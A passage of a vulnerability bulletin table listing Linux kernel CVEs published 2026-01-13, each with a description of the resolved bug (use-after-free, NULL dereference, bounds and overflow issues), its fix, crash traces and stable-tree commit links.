https://git.kernel.org/stable/c/91e448e69aca4bb0ba2e998eb3e555644db7322b https://git.kernel.org/stable/c/dbc61834b0412435df21c71410562d933e4eba49 https://git.kernel.org/stable/c/3ed049fbfb4d75b4e0b8ab54c934f485129d5dc8 https://git.kernel.org/stable/c/382748c05e58a9f1935f5a653c352422375566ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: phy: fsl-usb: Fix use-after-free in delayed work during device removal The delayed work item otg_event is initialized in fsl_otg_conf() and scheduled under two conditions: 1. When a host controller binds to the OTG controller. 2. When the USB ID pin state changes (cable insertion/removal). A race condition occurs when the device is removed via fsl_otg_remove(): the fsl_otg instance may be freed while the delayed work is still pending or executing. This leads to use-after-free when the work function fsl_otg_event() accesses the already freed memory. The problematic scenario: (detach thread) | (delayed work) fsl_otg_remove() | kfree(fsl_otg_dev) //FREE| fsl_otg_event() | og = container_of(...) //USE | og-> //USE Fix this by calling disable_delayed_work_sync() in fsl_otg_remove() before deallocating the fsl_otg structure. This ensures the delayed work is properly canceled and completes execution prior to memory deallocation. This bug was identified through static analysis. | 2026-01-13 | not yet calculated | CVE-2025-68781 | https://git.kernel.org/stable/c/4476c73bbbb09b13a962176fca934b32d3954a2e https://git.kernel.org/stable/c/319f7a85b3c4e34ac2fe083eb146fe129a556317 https://git.kernel.org/stable/c/69f9a0701abc3d1f8225074c56c27e6c16a37222 https://git.kernel.org/stable/c/2e7c47e2eb3cfeadf78a1ccbac8492c60d508f23 https://git.kernel.org/stable/c/41ca62e3e21e48c2903b3b45e232cf4f2ff7434f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: target: Reset t_task_cdb pointer in error case If allocation of cmd->t_task_cdb fails, it remains NULL but is later dereferenced in the 'err' path. In case of error, reset NULL t_task_cdb value to point at the default fixed-size buffer. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-01-13 | not yet calculated | CVE-2025-68782 | https://git.kernel.org/stable/c/6cac97b12bdab04832e0416d049efcd0d48d303b https://git.kernel.org/stable/c/45fd86b444105c8bd07a763f58635c87e5dc7aea https://git.kernel.org/stable/c/8727663ded659aad55eef21e3864ebf5a4796a96 https://git.kernel.org/stable/c/0260ad551b0815eb788d47f32899fbcd65d6f128 https://git.kernel.org/stable/c/0d36db68fdb8a3325386fd9523b67735f944e1f3 https://git.kernel.org/stable/c/8edbb9e371af186b4cf40819dab65fafe109df4d https://git.kernel.org/stable/c/5053eab38a4c4543522d0c320c639c56a8b59908 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-mixer: us16x08: validate meter packet indices get_meter_levels_from_urb() parses the 64-byte meter packets sent by the device and fills the per-channel arrays meter_level[], comp_level[] and master_level[] in struct snd_us16x08_meter_store. Currently the function derives the channel index directly from the meter packet (MUB2(meter_urb, s) - 1) and uses it to index those arrays without validating the range. If the packet contains a negative or out-of-range channel number, the driver may write past the end of these arrays. Introduce a local channel variable and validate it before updating the arrays. We reject negative indices, limit meter_level[] and comp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[] updates with ARRAY_SIZE(master_level). | 2026-01-13 | not yet calculated | CVE-2025-68783 | https://git.kernel.org/stable/c/53461710a95e15ac1f6542450943a492ecf8e550 https://git.kernel.org/stable/c/2168866396bd28ec4f3c8da0fbc7d08b5bd4f053 https://git.kernel.org/stable/c/cde47f4ccad6751ac36b7471572ddf38ee91870c https://git.kernel.org/stable/c/2f21a7cbaaa93926f5be15bc095b9c57c35748d9 https://git.kernel.org/stable/c/a8ad320efb663be30b794e3dd3e829301c0d0ed3 https://git.kernel.org/stable/c/eaa95228b8a56c4880a182c0350d67922b22408f https://git.kernel.org/stable/c/5526c1c6ba1d0913c7dfcbbd6fe1744ea7c55f1e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: fix a UAF problem in xattr repair The xchk_setup_xattr_buf function can allocate a new value buffer, which means that any reference to ab->value before the call could become a dangling pointer. Fix this by moving an assignment to after the buffer setup. | 2026-01-13 | not yet calculated | CVE-2025-68784 | https://git.kernel.org/stable/c/1e2d3aa19c7962b9474b22893160cb460494c45f https://git.kernel.org/stable/c/d29ed9ff972afe17c215cab171761d7a15d7063f https://git.kernel.org/stable/c/5990fd756943836978ad184aac980e2b36ab7e01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: fix middle attribute validation in push_nsh() action The push_nsh() action structure looks like this: OVS_ACTION_ATTR_PUSH_NSH(OVS_KEY_ATTR_NSH(OVS_NSH_KEY_ATTR_BASE,...)) The outermost OVS_ACTION_ATTR_PUSH_NSH attribute is OK'ed by the nla_for_each_nested() inside __ovs_nla_copy_actions(). The innermost OVS_NSH_KEY_ATTR_BASE/MD1/MD2 are OK'ed by the nla_for_each_nested() inside nsh_key_put_from_nlattr(). But nothing checks if the attribute in the middle is OK. We don't even check that this attribute is the OVS_KEY_ATTR_NSH. We just do a double unwrap with a pair of nla_data() calls - first time directly while calling validate_push_nsh() and the second time as part of the nla_for_each_nested() macro, which isn't safe, potentially causing invalid memory access if the size of this attribute is incorrect. The failure may not be noticed during validation due to larger netlink buffer, but cause trouble later during action execution where the buffer is allocated exactly to the size: BUG: KASAN: slab-out-of-bounds in nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch] Read of size 184 at addr ffff88816459a634 by task a.out/22624 CPU: 8 UID: 0 PID: 22624 6.18.0-rc7+ #115 PREEMPT(voluntary) Call Trace: <TASK> dump_stack_lvl+0x51/0x70 print_address_description.constprop.0+0x2c/0x390 kasan_report+0xdd/0x110 kasan_check_range+0x35/0x1b0 __asan_memcpy+0x20/0x60 nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch] push_nsh+0x82/0x120 [openvswitch] do_execute_actions+0x1405/0x2840 [openvswitch] ovs_execute_actions+0xd5/0x3b0 [openvswitch] ovs_packet_cmd_execute+0x949/0xdb0 [openvswitch] genl_family_rcv_msg_doit+0x1d6/0x2b0 genl_family_rcv_msg+0x336/0x580 genl_rcv_msg+0x9f/0x130 netlink_rcv_skb+0x11f/0x370 genl_rcv+0x24/0x40 netlink_unicast+0x73e/0xaa0 netlink_sendmsg+0x744/0xbf0 __sys_sendto+0x3d6/0x450 do_syscall_64+0x79/0x2c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e </TASK> Let's add some checks that the attribute is properly sized and it's the only one attribute inside the action. Technically, there is no real reason for OVS_KEY_ATTR_NSH to be there, as we know that we're pushing an NSH header already, it just creates extra nesting, but that's how uAPI works today. So, keeping as it is. | 2026-01-13 | not yet calculated | CVE-2025-68785 | https://git.kernel.org/stable/c/d0c135b8bbbcf92836068fd395bebeb7ae6c7bef https://git.kernel.org/stable/c/3bc2efff20a38b2c7ca18317649715df0dd62ced https://git.kernel.org/stable/c/1b569db9c2f28b599e40050524aae5f7332bc294 https://git.kernel.org/stable/c/10ffc558246f2c75619aedda0921906095e46702 https://git.kernel.org/stable/c/2ecfc4433acdb149eafd7fb22d7fd4adf90b25e9 https://git.kernel.org/stable/c/c999153bfb2d1d9b295b7010d920f2a7c6d7595f https://git.kernel.org/stable/c/5ace7ef87f059d68b5f50837ef3e8a1a4870c36e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: skip lock-range check on equal size to avoid size==0 underflow When size equals the current i_size (including 0), the code used to call check_lock_range(filp, i_size, size - 1, WRITE), which computes `size - 1` and can underflow for size==0. Skip the equal case. | 2026-01-13 | not yet calculated | CVE-2025-68786 | https://git.kernel.org/stable/c/52fcbb92e0d3acfd1448b2a43b6595d540da5295 https://git.kernel.org/stable/c/da29cd197246c85c0473259f1cad897d9d28faea https://git.kernel.org/stable/c/a6f4cfa3783804336491e0edcb250c25f9b59d33 https://git.kernel.org/stable/c/571204e4758a528fbd67330bd4b0dfbdafb33dd8 https://git.kernel.org/stable/c/5d510ac31626ed157d2182149559430350cf2104 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netrom: Fix memory leak in nr_sendmsg() syzbot reported a memory leak [1]. When function sock_alloc_send_skb() return NULL in nr_output(), the original skb is not freed, which was allocated in nr_sendmsg(). Fix this by freeing it before return. [1] BUG: memory leak unreferenced object 0xffff888129f35500 (size 240): comm "syz.0.17", pid 6119, jiffies 4294944652 hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 10 52 28 81 88 ff ff ..........R(.... backtrace (crc 1456a3e4): kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline] slab_post_alloc_hook mm/slub.c:4983 [inline] slab_alloc_node mm/slub.c:5288 [inline] kmem_cache_alloc_node_noprof+0x36f/0x5e0 mm/slub.c:5340 __alloc_skb+0x203/0x240 net/core/skbuff.c:660 alloc_skb include/linux/skbuff.h:1383 [inline] alloc_skb_with_frags+0x69/0x3f0 net/core/skbuff.c:6671 sock_alloc_send_pskb+0x379/0x3e0 net/core/sock.c:2965 sock_alloc_send_skb include/net/sock.h:1859 [inline] nr_sendmsg+0x287/0x450 net/netrom/af_netrom.c:1105 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] sock_write_iter+0x293/0x2a0 net/socket.c:1195 new_sync_write fs/read_write.c:593 [inline] vfs_write+0x45d/0x710 fs/read_write.c:686 ksys_write+0x143/0x170 fs/read_write.c:738 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xa4/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2026-01-13 | not yet calculated | CVE-2025-68787 | https://git.kernel.org/stable/c/f77e538ac4e3adb1882d5bccb7bfdc111b5963d3 https://git.kernel.org/stable/c/09efbf54eeaecebe882af603c9939a4b1bb9567e https://git.kernel.org/stable/c/73839497bbde5cd4fd02bbd9c8bc2640780ae65d https://git.kernel.org/stable/c/156a0f6341dce634a825db49ca20b48b1ae9bcc1 https://git.kernel.org/stable/c/8d1ccba4b171cd504ecfa47349cb9864fc9d687c https://git.kernel.org/stable/c/51f5fbc1681bdcffcc7d18bf3dfdb2b1278d3977 https://git.kernel.org/stable/c/613d12dd794e078be8ff3cf6b62a6b9acf7f4619 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fsnotify: do not generate ACCESS/MODIFY events on child for special files inotify/fanotify do not allow users with no read access to a file to subscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the same user to subscribe for watching events on children when the user has access to the parent directory (e.g. /dev). Users with no read access to a file but with read access to its parent directory can still stat the file and see if it was accessed/modified via atime/mtime change. The same is not true for special files (e.g. /dev/null). Users will not generally observe atime/mtime changes when other users read/write to special files, only when someone sets atime/mtime via utimensat(). Align fsnotify events with this stat behavior and do not generate ACCESS/MODIFY events to parent watchers on read/write of special files. The events are still generated to parent watchers on utimensat(). This closes some side-channels that could be possibly used for information exfiltration [1]. [1] https://snee.la/pdf/pubs/file-notification-attacks.pdf | 2026-01-13 | not yet calculated | CVE-2025-68788 | https://git.kernel.org/stable/c/df2711544b050aba703e6da418c53c7dc5d443ca https://git.kernel.org/stable/c/859bdf438f01d9aa7f84b09c1202d548c7cad9e8 https://git.kernel.org/stable/c/6a7d7d96eeeab7af2bd01afbb3d9878a11a13d91 https://git.kernel.org/stable/c/e0643d46759db8b84c0504a676043e5e341b6c81 https://git.kernel.org/stable/c/82f7416bcbd951549e758d15fc1a96a5afc2e900 https://git.kernel.org/stable/c/7a93edb23bcf07a3aaf8b598edfc2faa8fbcc0b6 https://git.kernel.org/stable/c/635bc4def026a24e071436f4f356ea08c0eed6ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (ibmpex) fix use-after-free in high/low store The ibmpex_high_low_store() function retrieves driver data using dev_get_drvdata() and uses it without validation. This creates a race condition where the sysfs callback can be invoked after the data structure is freed, leading to use-after-free. Fix by adding a NULL check after dev_get_drvdata(), and reordering operations in the deletion path to prevent TOCTOU. | 2026-01-13 | not yet calculated | CVE-2025-68789 | https://git.kernel.org/stable/c/3ce9b7ae9d4d148672b35147aaf7987a4f82bb94 https://git.kernel.org/stable/c/533ead425f8109b02fecc7e72d612b8898ec347a https://git.kernel.org/stable/c/fa37adcf1d564ef58b9dfb01b6c36d35c5294bad https://git.kernel.org/stable/c/68d62e5bebbd118b763e8bb210d5cf2198ef450c https://git.kernel.org/stable/c/5aa2139201667c1f644601e4529c4acd6bf8db5a https://git.kernel.org/stable/c/6946c726c3f4c36f0f049e6f97e88c510b15f65d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix double unregister of HCA_PORTS component Clear hca_devcom_comp in device's private data after unregistering it in LAG teardown. Otherwise a slightly lagging second pass through mlx5_unload_one() might try to unregister it again and trip over use-after-free. On s390 almost all PCI level recovery events trigger two passes through mxl5_unload_one() - one through the poll_health() method and one through mlx5_pci_err_detected() as callback from generic PCI error recovery. While testing PCI error recovery paths with more kernel debug features enabled, this issue reproducibly led to kernel panics with the following call chain: Unable to handle kernel pointer dereference in virtual kernel address space Failing address: 6b6b6b6b6b6b6000 TEID: 6b6b6b6b6b6b6803 ESOP-2 FSI Fault in home space mode while using kernel ASCE. AS:00000000705c4007 R3:0000000000000024 Oops: 0038 ilc:3 [#1]SMP CPU: 14 UID: 0 PID: 156 Comm: kmcheck Kdump: loaded Not tainted 6.18.0-20251130.rc7.git0.16131a59cab1.300.fc43.s390x+debug #1 PREEMPT Krnl PSW : 0404e00180000000 0000020fc86aa1dc (__lock_acquire+0x5c/0x15f0) R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:2 PM:0 RI:0 EA:3 Krnl GPRS: 0000000000000000 0000020f00000001 6b6b6b6b6b6b6c33 0000000000000000 0000000000000000 0000000000000000 0000000000000001 0000000000000000 0000000000000000 0000020fca28b820 0000000000000000 0000010a1ced8100 0000010a1ced8100 0000020fc9775068 0000018fce14f8b8 0000018fce14f7f8 Krnl Code: 0000020fc86aa1cc: e3b003400004 lg %r11,832 0000020fc86aa1d2: a7840211 brc 8,0000020fc86aa5f4 *0000020fc86aa1d6: c09000df0b25 larl %r9,0000020fca28b820 >0000020fc86aa1dc: d50790002000 clc 0(8,%r9),0(%r2) 0000020fc86aa1e2: a7840209 brc 8,0000020fc86aa5f4 0000020fc86aa1e6: c0e001100401 larl %r14,0000020fca8aa9e8 0000020fc86aa1ec: c01000e25a00 larl %r1,0000020fca2f55ec 0000020fc86aa1f2: a7eb00e8 aghi %r14,232 Call Trace: __lock_acquire+0x5c/0x15f0 lock_acquire.part.0+0xf8/0x270 lock_acquire+0xb0/0x1b0 down_write+0x5a/0x250 mlx5_detach_device+0x42/0x110 [mlx5_core] mlx5_unload_one_devl_locked+0x50/0xc0 [mlx5_core] mlx5_unload_one+0x42/0x60 [mlx5_core] mlx5_pci_err_detected+0x94/0x150 [mlx5_core] zpci_event_attempt_error_recovery+0xcc/0x388 | 2026-01-13 | not yet calculated | CVE-2025-68790 | https://git.kernel.org/stable/c/d2495f529d60e8e8c43e6ad524089c38b8be7bc4 https://git.kernel.org/stable/c/6a107cfe9c99a079e578a4c5eb70038101a3599f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fuse: missing copy_finish in fuse-over-io-uring argument copies Fix a possible reference count leak of payload pages during fuse argument copies. [Joanne: simplified error cleanup] | 2026-01-13 | not yet calculated | CVE-2025-68791 | https://git.kernel.org/stable/c/b79938863f436960eff209130f025c4bd3026bf8 https://git.kernel.org/stable/c/6e0d7f7f4a43ac8868e98c87ecf48805aa8c24dd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm2-sessions: Fix out of range indexing in name_size 'name_size' does not have any range checks, and it just directly indexes with TPM_ALG_ID, which could lead into memory corruption at worst. Address the issue by only processing known values and returning -EINVAL for unrecognized values. Make also 'tpm_buf_append_name' and 'tpm_buf_fill_hmac_session' fallible so that errors are detected before causing any spurious TPM traffic. End also the authorization session on failure in both of the functions, as the session state would be then by definition corrupted. | 2026-01-13 | not yet calculated | CVE-2025-68792 | https://git.kernel.org/stable/c/47e676ce4d68f461dfcab906f6aeb254f7276deb https://git.kernel.org/stable/c/04a3aa6e8c5f878cc51a8a1c90b6d3c54079bc43 https://git.kernel.org/stable/c/6e9722e9a7bfe1bbad649937c811076acf86e1fd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix a job->pasid access race in gpu recovery Avoid a possible UAF in GPU recovery due to a race between the sched timeout callback and the tdr work queue. The gpu recovery function calls drm_sched_stop() and later drm_sched_start(). drm_sched_start() restarts the tdr queue which will eventually free the job. If the tdr queue frees the job before time out callback completes, the job will be freed and we'll get a UAF when accessing the pasid. Cache it early to avoid the UAF. Example KASAN trace: [ 493.058141] BUG: KASAN: slab-use-after-free in amdgpu_device_gpu_recover+0x968/0x990 [amdgpu] [ 493.067530] Read of size 4 at addr ffff88b0ce3f794c by task kworker/u128:1/323 [ 493.074892] [ 493.076485] CPU: 9 UID: 0 PID: 323 Comm: kworker/u128:1 Tainted: G E 6.16.0-1289896.2.zuul.bf4f11df81c1410bbe901c4373305a31 #1 PREEMPT(voluntary) [ 493.076493] Tainted: [E]=UNSIGNED_MODULE [ 493.076495] Hardware name: TYAN B8021G88V2HR-2T/S8021GM2NR-2T, BIOS V1.03.B10 04/01/2019 [ 493.076500] Workqueue: amdgpu-reset-dev drm_sched_job_timedout [gpu_sched] [ 493.076512] Call Trace: [ 493.076515] <TASK> [ 493.076518] dump_stack_lvl+0x64/0x80 [ 493.076529] print_report+0xce/0x630 [ 493.076536] ? _raw_spin_lock_irqsave+0x86/0xd0 [ 493.076541] ? __pfx__raw_spin_lock_irqsave+0x10/0x10 [ 493.076545] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu] [ 493.077253] kasan_report+0xb8/0xf0 [ 493.077258] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu] [ 493.077965] amdgpu_device_gpu_recover+0x968/0x990 [amdgpu] [ 493.078672] ? __pfx_amdgpu_device_gpu_recover+0x10/0x10 [amdgpu] [ 493.079378] ? amdgpu_coredump+0x1fd/0x4c0 [amdgpu] [ 493.080111] amdgpu_job_timedout+0x642/0x1400 [amdgpu] [ 493.080903] ? pick_task_fair+0x24e/0x330 [ 493.080910] ? __pfx_amdgpu_job_timedout+0x10/0x10 [amdgpu] [ 493.081702] ? _raw_spin_lock+0x75/0xc0 [ 493.081708] ? __pfx__raw_spin_lock+0x10/0x10 [ 493.081712] drm_sched_job_timedout+0x1b0/0x4b0 [gpu_sched] [ 493.081721] ? __pfx__raw_spin_lock_irq+0x10/0x10 [ 493.081725] process_one_work+0x679/0xff0 [ 493.081732] worker_thread+0x6ce/0xfd0 [ 493.081736] ? __pfx_worker_thread+0x10/0x10 [ 493.081739] kthread+0x376/0x730 [ 493.081744] ? __pfx_kthread+0x10/0x10 [ 493.081748] ? __pfx__raw_spin_lock_irq+0x10/0x10 [ 493.081751] ? __pfx_kthread+0x10/0x10 [ 493.081755] ret_from_fork+0x247/0x330 [ 493.081761] ? __pfx_kthread+0x10/0x10 [ 493.081764] ret_from_fork_asm+0x1a/0x30 [ 493.081771] </TASK> (cherry picked from commit 20880a3fd5dd7bca1a079534cf6596bda92e107d) | 2026-01-13 | not yet calculated | CVE-2025-68793 | https://git.kernel.org/stable/c/dac58c012c47cadf337a35eb05d44498c43e5cd0 https://git.kernel.org/stable/c/77f73253015cbc7893fca1821ac3eae9eb4bc943 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iomap: adjust read range correctly for non-block-aligned positions iomap_adjust_read_range() assumes that the position and length passed in are block-aligned. This is not always the case however, as shown in the syzbot generated case for erofs. This causes too many bytes to be skipped for uptodate blocks, which results in returning the incorrect position and length to read in. If all the blocks are uptodate, this underflows length and returns a position beyond the folio. Fix the calculation to also take into account the block offset when calculating how many bytes can be skipped for uptodate blocks. | 2026-01-13 | not yet calculated | CVE-2025-68794 | https://git.kernel.org/stable/c/82b60ffbb532d919959702768dca04c3c0500ae5 https://git.kernel.org/stable/c/12053695c8ef5410e8cc6c9ed4c0db9cd9c82b3e https://git.kernel.org/stable/c/142194fb21afe964d2d194cab1fc357cbf87e899 https://git.kernel.org/stable/c/7aa6bc3e8766990824f66ca76c19596ce10daf3e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ethtool: Avoid overflowing userspace buffer on stats query The ethtool -S command operates across three ioctl calls: ETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and ETHTOOL_GSTATS for the values. If the number of stats changes between these calls (e.g., due to device reconfiguration), userspace's buffer allocation will be incorrect, potentially leading to buffer overflow. Drivers are generally expected to maintain stable stat counts, but some drivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making this scenario possible. Some drivers try to handle this internally: - bnad_get_ethtool_stats() returns early in case stats.n_stats is not equal to the driver's stats count. - micrel/ksz884x also makes sure not to write anything beyond stats.n_stats and overflow the buffer. However, both use stats.n_stats which is already assigned with the value returned from get_sset_count(), hence won't solve the issue described here. Change ethtool_get_strings(), ethtool_get_stats(), ethtool_get_phy_stats() to not return anything in case of a mismatch between userspace's size and get_sset_size(), to prevent buffer overflow. The returned n_stats value will be equal to zero, to reflect that nothing has been returned. This could result in one of two cases when using upstream ethtool, depending on when the size change is detected: 1. When detected in ethtool_get_strings(): # ethtool -S eth2 no stats available 2. When detected in get stats, all stats will be reported as zero. Both cases are presumably transient, and a subsequent ethtool call should succeed. Other than the overflow avoidance, these two cases are very evident (no output/cleared stats), which is arguably better than presenting incorrect/shifted stats. I also considered returning an error instead of a "silent" response, but that seems more destructive towards userspace apps. Notes: - This patch does not claim to fix the inherent race, it only makes sure that we do not overflow the userspace buffer, and makes for a more predictable behavior. - RTNL lock is held during each ioctl, the race window exists between the separate ioctl calls when the lock is released. - Userspace ethtool always fills stats.n_stats, but it is likely that these stats ioctls are implemented in other userspace applications which might not fill it. The added code checks that it's not zero, to prevent any regressions. | 2026-01-13 | not yet calculated | CVE-2025-68795 | https://git.kernel.org/stable/c/3df375a1e75483b7d973c3cc2e46aa374db8428b https://git.kernel.org/stable/c/f9dc0f45d2cd0189ce666288a29d2cc32c2e44d5 https://git.kernel.org/stable/c/4afcb985355210e1688560dc47e64b94dad35d71 https://git.kernel.org/stable/c/ca9983bc3a1189bd72f9ae449d925a66b2616326 https://git.kernel.org/stable/c/7bea09f60f2ad5d232e2db8f1c14e850fd3fd416 https://git.kernel.org/stable/c/4066b5b546293f44cd6d0e84ece6e3ee7ff27093 https://git.kernel.org/stable/c/7b07be1ff1cb6c49869910518650e8d0abc7d25f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to avoid updating zero-sized extent in extent cache As syzbot reported: F2FS-fs (loop0): __update_extent_tree_range: extent len is zero, type: 0, extent [0, 0, 0], age [0, 0] ------------[ cut here ]------------ kernel BUG at fs/f2fs/extent_cache.c:678! Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI CPU: 0 UID: 0 PID: 5336 Comm: syz.0.0 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:__update_extent_tree_range+0x13bc/0x1500 fs/f2fs/extent_cache.c:678 Call Trace: <TASK> f2fs_update_read_extent_cache_range+0x192/0x3e0 fs/f2fs/extent_cache.c:1085 f2fs_do_zero_range fs/f2fs/file.c:1657 [inline] f2fs_zero_range+0x10c1/0x1580 fs/f2fs/file.c:1737 f2fs_fallocate+0x583/0x990 fs/f2fs/file.c:2030 vfs_fallocate+0x669/0x7e0 fs/open.c:342 ioctl_preallocate fs/ioctl.c:289 [inline] file_ioctl+0x611/0x780 fs/ioctl.c:-1 do_vfs_ioctl+0xb33/0x1430 fs/ioctl.c:576 __do_sys_ioctl fs/ioctl.c:595 [inline] __se_sys_ioctl+0x82/0x170 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f07bc58eec9 In error path of f2fs_zero_range(), it may add a zero-sized extent into extent cache, it should be avoided. | 2026-01-13 | not yet calculated | CVE-2025-68796 | https://git.kernel.org/stable/c/9c07bd262c13ca922adad6e7613d48505f97f548 https://git.kernel.org/stable/c/72c58a82e6fb7b327e8701f5786c70c3edc56188 https://git.kernel.org/stable/c/e50b81c50fcbe63f50405bb40f262162ff32af88 https://git.kernel.org/stable/c/efe3371001f50a2d6f746b50bdc6f9f26b2089ec https://git.kernel.org/stable/c/4f244c64efe628d277b916f47071adf480eb8646 https://git.kernel.org/stable/c/bac23833220a1f8fe8dfab7e16efa20ff64d7589 https://git.kernel.org/stable/c/7c37c79510329cd951a4dedf3f7bf7e2b18dccec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: char: applicom: fix NULL pointer dereference in ac_ioctl Discovered by Atuin - Automated Vulnerability Discovery Engine. In ac_ioctl, the validation of IndexCard and the check for a valid RamIO pointer are skipped when cmd is 6. However, the function unconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the end. If cmd is 6, IndexCard may reference a board that does not exist (where RamIO is NULL), leading to a NULL pointer dereference. Fix this by skipping the readb access when cmd is 6, as this command is a global information query and does not target a specific board context. | 2026-01-13 | not yet calculated | CVE-2025-68797 | https://git.kernel.org/stable/c/5a6240804fb7bbd4f5f6e706955248a6f4c1abbc https://git.kernel.org/stable/c/d1b0452280029d05a98c75631131ee61c0b0d084 https://git.kernel.org/stable/c/0b8b353e09888bccee405e0dd6feafb60360f478 https://git.kernel.org/stable/c/d285517429a75423789e6408653e57b6fdfc8e54 https://git.kernel.org/stable/c/74883565c621eec6cd2e35fe6d27454cf2810c23 https://git.kernel.org/stable/c/f83e3e9f89181b42f6076a115d767a7552c4a39e https://git.kernel.org/stable/c/82d12088c297fa1cef670e1718b3d24f414c23f7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86/amd: Check event before enable to avoid GPF On AMD machines cpuc->events[idx] can become NULL in a subtle race condition with NMI->throttle->x86_pmu_stop(). Check event for NULL in amd_pmu_enable_all() before enable to avoid a GPF. This appears to be an AMD only issue. Syzkaller reported a GPF in amd_pmu_enable_all. INFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143 msecs Oops: general protection fault, probably for non-canonical address 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7] CPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk RIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195 arch/x86/events/core.c:1430) RSP: 0018:ffff888118009d60 EFLAGS: 00010012 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 RDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0 RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002 R13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601 FS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0 Call Trace: <IRQ> amd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2)) x86_pmu_enable (arch/x86/events/core.c:1360) event_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186 kernel/events/core.c:2346) __perf_remove_from_context (kernel/events/core.c:2435) event_function (kernel/events/core.c:259) remote_function (kernel/events/core.c:92 (discriminator 1) kernel/events/core.c:72 (discriminator 1)) __flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64 kernel/smp.c:135 kernel/smp.c:540) __sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272) sysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47) arch/x86/kernel/smp.c:266 (discriminator 47)) </IRQ> | 2026-01-13 | not yet calculated | CVE-2025-68798 | https://git.kernel.org/stable/c/49324a0c40f7e9bae1bd0362d23fc42232e14621 https://git.kernel.org/stable/c/6e41d9ec8d7cc3f01b9ba785e05f0ebef8b3b37f https://git.kernel.org/stable/c/e1028fb38b328084bc683a4efb001c95d3108573 https://git.kernel.org/stable/c/43c2e5c2acaae50e99d1c20a5a46e367c442fb3b https://git.kernel.org/stable/c/866cf36bfee4fba6a492d2dcc5133f857e3446b0 |
